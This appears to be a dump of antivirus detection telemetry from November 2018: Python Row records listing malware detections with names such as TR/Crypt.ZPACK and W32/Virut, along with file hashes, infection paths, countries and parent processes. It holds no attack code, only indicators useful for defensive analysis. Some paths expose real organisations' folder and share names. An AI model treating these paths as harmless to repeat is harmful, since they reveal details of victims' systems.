  Row(detection=Row(filename='avscan-20181102-140704-82b68a8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4817a3\\AVSCAN-20181102-140651-807F2E16\\AVSCAN-20181102-140704-82B68A8F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jmbrxyw.exe', filepath='c:\\users\\X\\appdata\\roaming\\jmbrxyw.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T16:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xwxcigfcfhr.exe', filepath='c:\\users\\X\\appdata\\roaming\\xwxcigfcfhr.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T20:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212628-07806a51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ea6883b\\AVSCAN-20181102-212603-0463A56C\\AVSCAN-20181102-212628-07806A51', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185322-5ec04dd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae478353\\AVSCAN-20181102-185257-59CED74F\\AVSCAN-20181102-185322-5EC04DD7', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:53:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upohth.exe', filepath='c:\\users\\X\\appdata\\roaming\\upohth.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=460288, timestamp='2018-11-02T17:38:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bi.exe', filepath='c:\\users\\X\\appdata\\roaming\\bi.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=460288, timestamp='2018-11-02T19:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bqbd.exe', filepath='c:\\users\\X\\appdata\\roaming\\bqbd.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=431616, timestamp='2018-11-02T20:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oyjk.exe', filepath='c:\\users\\X\\appdata\\roaming\\oyjk.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212545-35f18de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47baa8ee\\AVSCAN-20181102-212522-31D92C15\\AVSCAN-20181102-212545-35F18DE6', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:25:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sv.exe', filepath='c:\\users\\X\\appdata\\roaming\\sv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=427008, timestamp='2018-11-02T20:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181511-c3bacda1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5718ca8a\\AVSCAN-20181102-181433-BEA36412\\AVSCAN-20181102-181511-C3BACDA1', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162344-0fbf4e7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ac14353\\AVSCAN-20181102-161826-D810725D\\AVSCAN-20181102-162344-0FBF4E7F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:23:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172319-dad0c727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c376d199\\AVSCAN-20181102-172230-D5BF07A9\\AVSCAN-20181102-172319-DAD0C727', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:23:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171836-710f6dd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b393e252\\AVSCAN-20181102-171720-6C9F9B2D\\AVSCAN-20181102-171836-710F6DD8', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160851-5ce946b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9182db30\\AVSCAN-20181102-160831-597C75AA\\AVSCAN-20181102-160851-5CE946B5', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bgf8mewf.exe', filepath='C:\\Users\\X\\Desktop\\bgF8mEwf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='A1', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T12:30:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155024-6d3aa76f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4db15238\\AVSCAN-20181102-154945-699A47EF\\AVSCAN-20181102-155024-6D3AA76F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:50:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vsjbibjq.exe', filepath='c:\\users\\X\\appdata\\roaming\\vsjbibjq.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141732-79130964', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6780552\\AVSCAN-20181102-141703-76172A49\\AVSCAN-20181102-141732-79130964', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161754-3e0c2911', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ec32ac0\\AVSCAN-20181102-161732-3B48D06E\\AVSCAN-20181102-161754-3E0C2911', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nj.exe', filepath='c:\\users\\X\\appdata\\roaming\\nj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T13:16:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spwgzabc.exe', filepath='c:\\users\\X\\appdata\\roaming\\spwgzabc.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134831-aaccadb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab583275\\AVSCAN-20181102-134728-9D69206C\\AVSCAN-20181102-134831-AACCADB1', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='btav.exe', filepath='c:\\users\\X\\appdata\\roaming\\btav.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T15:55:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175839-3a56813c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ba4b527\\AVSCAN-20181102-175817-374E9345\\AVSCAN-20181102-175839-3A56813C', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:58:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sdnbqwjzvle.exe', filepath='c:\\users\\X\\appdata\\roaming\\sdnbqwjzvle.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T16:52:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gj.exe', filepath='c:\\users\\X\\appdata\\roaming\\gj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:45:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mfskwkw.exe', filepath='c:\\users\\X\\appdata\\roaming\\mfskwkw.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T13:24:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150104-66538f9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35a45c3c\\AVSCAN-20181102-150048-63AA2A42\\AVSCAN-20181102-150104-66538F9A', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='handbuch-for-220-downloader.exe', filepath='\\\\MBWSERVER\\03 Buchhaltung\\Richter\\PC 1\\eigene Dateien PC1\\Downloads\\Zinsberechnungen\\handbuch-for-220-Downloader.exe', filesize=472000, name='PUA/DownloadGuide.Gen.#M300.#R6099'), hash='8cb630568b88e31b988e89bd96321fddc86529026ec1fecc21be02f7ce38bd47', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:14:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='production fida.exe', filepath='E:\\fidassur\\LOUBNA\\production fida.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='8cc20abc68cca849c2b6e25df05048158dcffce1684e06ada6ec9c0f1357cf8d', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winmgmt.exe', filepath='d:\\windows\\system32\\wbem\\WinMgmt.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8cd27bd744d913a4a5540c94adcbf5479eefe1bbb46d93d116209f946f78e84a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D415C15376BECEE5D6BD66250B812FDB9442D814ACE3F61A26F73537FEAB54D', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D415C15376BECEE5D6BD66250B812FDB9442D814ACE3F61A26F73537FEAB54D', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D415C15376BECEE5D6BD66250B812FDB9442D814ACE3F61A26F73537FEAB54D', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:05:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082806-9b79d3a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a50dcda\\AVSCAN-20181102-082637-921A2E95\\AVSCAN-20181102-082806-9B79D3A6', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='danh sách học đtv.exe', filepath='H:\\\xa0\\USB__Data\\danh sách học ĐTV.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_00041e', filepath='C:\\Users\\X\\AppData\\Roaming\\Zalo\\Cache\\f_00041e', filesize=1024000, name='HEUR/AGEN.1019326.#M1.#R1'), hash='8dd97ad2b0e142abe4d90cefe2d87cb6bba2d0f030d9f1f22378dd9bdd0a0b0a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\Zalo\\Zalo.exe', parentsize=50125608, timestamp='2018-11-02T13:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203640-05ec7efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca1bc598\\AVSCAN-20181102-203617-03096FCC\\AVSCAN-20181102-203640-05EC7EFE', filesize=1024000, name='HEUR/AGEN.1019326.#M1.#R1'), hash='8dd97ad2b0e142abe4d90cefe2d87cb6bba2d0f030d9f1f22378dd9bdd0a0b0a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E025DDE317853E9B3D0F19A3C9754E7F959D562DD7627073C9891256044558B', filesize=1472000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E025DDE317853E9B3D0F19A3C9754E7F959D562DD7627073C9891256044558B', filesize=1472000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E025DDE317853E9B3D0F19A3C9754E7F959D562DD7627073C9891256044558B', filesize=1472000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:18:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptanks.exe', filepath='H:\\GAMES\\العاب خفيفة\\الدبابه\\PTANKS.EXE', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='8e3bb65d5edb5114926400ed08d41ff45584dfd1fe5bb5178f2fd153bf9c21d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T15:24:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E4EED58AE227AB614046E0EE176D4E2CB147BEFFA11BCA7D2B97DC07B17D2AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E4EED58AE227AB614046E0EE176D4E2CB147BEFFA11BCA7D2B97DC07B17D2AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E4EED58AE227AB614046E0EE176D4E2CB147BEFFA11BCA7D2B97DC07B17D2AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e4eed58ae227ab614046e0ee176d4e2cb147beffa11bca7d2b97dc07b17d2af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T22:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T17:57:26Z'), dt=datetime.date(2018, 11, 2)),
